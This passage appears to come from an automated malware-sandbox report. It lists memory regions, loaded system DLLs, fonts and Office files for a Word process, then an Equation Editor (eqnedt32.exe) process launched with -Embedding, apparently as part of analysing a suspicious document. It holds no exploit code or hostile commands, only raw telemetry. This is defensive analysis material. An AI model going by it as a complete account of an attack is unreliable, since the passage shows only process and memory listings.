(normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 289 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 290 start_va = 0x75340000 end_va = 0x7536cfff entry_point = 0x75340000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 291 start_va = 0x75370000 end_va = 0x75396fff entry_point = 0x75370000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 292 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 293 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 294 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 295 start_va = 0x75610000 end_va = 0x7580afff entry_point = 0x75610000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 296 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 297 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = 
mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 298 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 299 start_va = 0x76490000 end_va = 0x765c5fff entry_point = 0x76490000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 300 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 301 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 302 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 303 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 304 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 305 start_va = 0x76910000 end_va = 0x76aacfff entry_point = 0x76910000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 306 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 
region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 307 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 308 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 309 start_va = 0x76cf0000 end_va = 0x76de4fff entry_point = 0x76cf0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 310 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 311 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 312 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 313 start_va = 0x77110000 end_va = 0x77114fff entry_point = 0x77110000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 314 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 315 start_va = 0x77190000 end_va = 
0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 316 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 317 start_va = 0x7ff90000 end_va = 0x7ff9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff90000" filename = "" Region: id = 318 start_va = 0x7ffa0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffa0000" filename = "" Region: id = 319 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 320 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 321 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 322 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 323 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 324 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 325 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 326 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 327 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = 
"" Region: id = 328 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 329 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 330 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 331 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 332 start_va = 0x4e0000 end_va = 0x4eefff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 333 start_va = 0x700000 end_va = 0x703fff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 334 start_va = 0x710000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 335 start_va = 0x730000 end_va = 0x74efff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 336 start_va = 0x750000 end_va = 0x76efff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 337 start_va = 0xed0000 end_va = 0xed0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 338 start_va = 0xef0000 end_va = 0xf0efff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 339 start_va = 0xf10000 end_va = 0xf2efff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 340 start_va = 0xf30000 end_va = 0xf30fff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 341 start_va = 0x2110000 end_va = 0x212efff entry_point = 0x0 region_type 
= private name = "private_0x0000000002110000" filename = "" Region: id = 342 start_va = 0x2130000 end_va = 0x214efff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 343 start_va = 0x2180000 end_va = 0x219efff entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 344 start_va = 0x21c0000 end_va = 0x21defff entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 345 start_va = 0x21e0000 end_va = 0x21fdfff entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 346 start_va = 0x2270000 end_va = 0x228dfff entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 347 start_va = 0x2670000 end_va = 0x2690fff entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 348 start_va = 0x4b90000 end_va = 0x4c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 349 start_va = 0x75000000 end_va = 0x7505efff entry_point = 0x75000000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 350 start_va = 0x4d00000 end_va = 0x4d7ffff entry_point = 0x4d00000 region_type = mapped_file name = "~wrf{069f7e34-97bb-439a-a100-7bfb19244301}.tmp" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{069F7E34-97BB-439A-A100-7BFB19244301}.tmp" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{069f7e34-97bb-439a-a100-7bfb19244301}.tmp") Region: id = 351 start_va = 0x73740000 end_va = 0x73764fff entry_point = 0x73740000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: 
"c:\\windows\\system32\\powrprof.dll") Region: id = 699 start_va = 0x2160000 end_va = 0x2161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002160000" filename = "" Region: id = 700 start_va = 0x2170000 end_va = 0x2171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002170000" filename = "" Region: id = 701 start_va = 0x4d80000 end_va = 0x4e4bfff entry_point = 0x4d80000 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 702 start_va = 0x4eb0000 end_va = 0x4f76fff entry_point = 0x4eb0000 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 703 start_va = 0x4f80000 end_va = 0x507ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 704 start_va = 0x721c0000 end_va = 0x7224bfff entry_point = 0x721c0000 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 705 start_va = 0x726e0000 end_va = 0x7271bfff entry_point = 0x726e0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 706 start_va = 0x21a0000 end_va = 0x21a0fff entry_point = 0x21a0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 707 start_va = 0x2200000 end_va = 0x2200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 708 start_va = 0x2390000 end_va = 0x23a1fff entry_point = 0x2390000 region_type = mapped_file name = "uiautomationcore.dll.mui" filename = 
"\\Windows\\System32\\en-US\\UIAutomationCore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\uiautomationcore.dll.mui") Region: id = 709 start_va = 0x81d0000 end_va = 0x8681fff entry_point = 0x0 region_type = private name = "private_0x00000000081d0000" filename = "" Region: id = 710 start_va = 0x6ee70000 end_va = 0x6ee78fff entry_point = 0x6ee70000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 711 start_va = 0x75570000 end_va = 0x75572fff entry_point = 0x75570000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 712 start_va = 0x6fe10000 end_va = 0x6fe7ffff entry_point = 0x6fe10000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 713 start_va = 0x74f40000 end_va = 0x74f58fff entry_point = 0x74f40000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 714 start_va = 0x6fe80000 end_va = 0x6fe8afff entry_point = 0x6fe80000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 715 start_va = 0x73460000 end_va = 0x73469fff entry_point = 0x73460000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 716 start_va = 0x74ca0000 end_va = 0x74cb6fff entry_point = 0x74ca0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 717 start_va = 0x74850000 end_va = 0x7488cfff entry_point = 0x74850000 region_type = mapped_file name = "bcryptprimitives.dll" 
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 718 start_va = 0x3510000 end_va = 0x3510fff entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 719 start_va = 0x3520000 end_va = 0x3520fff entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 720 start_va = 0x3570000 end_va = 0x3571fff entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 721 start_va = 0x3580000 end_va = 0x3580fff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 722 start_va = 0x3590000 end_va = 0x3591fff entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 723 start_va = 0x35a0000 end_va = 0x35a1fff entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 724 start_va = 0x35b0000 end_va = 0x35b1fff entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 725 start_va = 0x35c0000 end_va = 0x35c1fff entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 726 start_va = 0x36e0000 end_va = 0x36e1fff entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 727 start_va = 0x36f0000 end_va = 0x36f1fff entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 728 start_va = 0x3700000 end_va = 0x3701fff entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 729 start_va = 0x3710000 end_va = 0x3711fff entry_point = 0x0 region_type = private name = "private_0x0000000003710000" filename = "" Region: id = 730 start_va = 0x81d0000 end_va = 0x8597fff entry_point = 0x0 region_type = private name = 
"private_0x00000000081d0000" filename = "" Region: id = 731 start_va = 0x85a0000 end_va = 0x864afff entry_point = 0x85a0000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 732 start_va = 0x8690000 end_va = 0x8e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 733 start_va = 0x8e90000 end_va = 0x8f49fff entry_point = 0x8e90000 region_type = mapped_file name = "calibril.ttf" filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf") Region: id = 734 start_va = 0x6e510000 end_va = 0x6e541fff entry_point = 0x6e510000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 735 start_va = 0x730000 end_va = 0x760fff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 736 start_va = 0x3730000 end_va = 0x3731fff entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 737 start_va = 0x3760000 end_va = 0x3761fff entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 738 start_va = 0x3780000 end_va = 0x3781fff entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 739 start_va = 0x3820000 end_va = 0x3821fff entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 740 start_va = 0x3840000 end_va = 0x3841fff entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 741 start_va = 0x7230000 end_va = 0x732ffff entry_point = 0x0 region_type = private name = "private_0x0000000007230000" filename = "" Region: id = 742 start_va = 0x8f50000 end_va = 0x9020fff entry_point = 0x8f50000 region_type = mapped_file name = 
"calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 743 start_va = 0x9030000 end_va = 0x9100fff entry_point = 0x0 region_type = private name = "private_0x0000000009030000" filename = "" Region: id = 744 start_va = 0x722b0000 end_va = 0x722e6fff entry_point = 0x722b0000 region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\office15\\msproof7.dll") Region: id = 745 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 746 start_va = 0x62cc0000 end_va = 0x63145fff entry_point = 0x62cc0000 region_type = mapped_file name = "msgr3en.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\1033\\MSGR3EN.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\proof\\1033\\msgr3en.dll") Region: id = 747 start_va = 0x43c0000 end_va = 0x43cffff entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 748 start_va = 0x7110000 end_va = 0x720ffff entry_point = 0x0 region_type = private name = "private_0x0000000007110000" filename = "" Region: id = 749 start_va = 0x7210000 end_va = 0x730ffff entry_point = 0x0 region_type = private name = "private_0x0000000007210000" filename = "" Region: id = 750 start_va = 0x7330000 end_va = 0x7481fff entry_point = 0x0 region_type = private name = "private_0x0000000007330000" filename = "" Region: id = 751 start_va = 0x91f0000 end_va = 0x92effff entry_point = 0x0 region_type = private name = "private_0x00000000091f0000" filename = "" Region: id = 752 start_va = 0x72130000 end_va = 0x721b9fff entry_point = 0x72130000 region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\msspell7.dll" (normalized: "c:\\program files\\microsoft 
office\\office15\\proof\\msspell7.dll") Region: id = 753 start_va = 0x7ff8f000 end_va = 0x7ff8ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff8f000" filename = "" Region: id = 754 start_va = 0xef0000 end_va = 0xf00fff entry_point = 0xef0000 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 755 start_va = 0xf10000 end_va = 0xf20fff entry_point = 0xf10000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 756 start_va = 0x2110000 end_va = 0x2140fff entry_point = 0x2110000 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 757 start_va = 0x2180000 end_va = 0x2190fff entry_point = 0x2180000 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 758 start_va = 0x21c0000 end_va = 0x21d0fff entry_point = 0x21c0000 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 759 start_va = 0x7490000 end_va = 0x758ffff entry_point = 0x0 region_type = private name = "private_0x0000000007490000" filename = "" Region: id = 760 start_va = 0x9460000 end_va = 0x946ffff entry_point = 0x0 region_type = private name = "private_0x0000000009460000" filename = "" Region: id = 761 start_va = 0x6f1b0000 end_va = 0x6f210fff entry_point = 0x6f1b0000 region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\mscss7en.dll" (normalized: "c:\\program files\\microsoft office\\office15\\mscss7en.dll") Region: id = 762 start_va = 0x71fe0000 end_va = 0x7212bfff entry_point = 0x71fe0000 region_type = mapped_file name = "mssp7en.lex" 
filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\office15\\proof\\mssp7en.lex") Region: id = 763 start_va = 0x6eaf0000 end_va = 0x6eb6efff entry_point = 0x6eaf0000 region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\CSS7DATA0009.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\css7data0009.dll") Region: id = 1858 start_va = 0x740000 end_va = 0x741fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1859 start_va = 0x750000 end_va = 0x750fff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1860 start_va = 0x790000 end_va = 0x7c1fff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1861 start_va = 0x73740000 end_va = 0x73764fff entry_point = 0x73740000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1862 start_va = 0x73970000 end_va = 0x73978fff entry_point = 0x73970000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Thread: id = 1 os_tid = 0x998 Thread: id = 2 os_tid = 0x994 Thread: id = 3 os_tid = 0x990 Thread: id = 4 os_tid = 0x98c Thread: id = 5 os_tid = 0x988 Thread: id = 6 os_tid = 0x984 Thread: id = 7 os_tid = 0x978 Thread: id = 8 os_tid = 0x974 Thread: id = 9 os_tid = 0x970 Thread: id = 10 os_tid = 0x96c Thread: id = 11 os_tid = 0x968 Thread: id = 12 os_tid = 0x960 Thread: id = 45 os_tid = 0xa84 Thread: id = 46 os_tid = 0xa8c Thread: id = 48 os_tid = 0xaa0 Process: id = "2" image_name = "eqnedt32.exe" filename = "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x7f1e6680" os_pid = "0x9f4" 
os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x95c" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 352 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 353 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 354 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 355 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 356 start_va = 0x400000 end_va = 0x48dfff entry_point = 0x400000 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 357 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 358 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" 
(normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 359 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 360 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 361 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 362 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 363 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 364 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 365 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 366 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 367 start_va = 0x72290000 end_va = 0x72313fff entry_point = 0x72290000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 368 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 
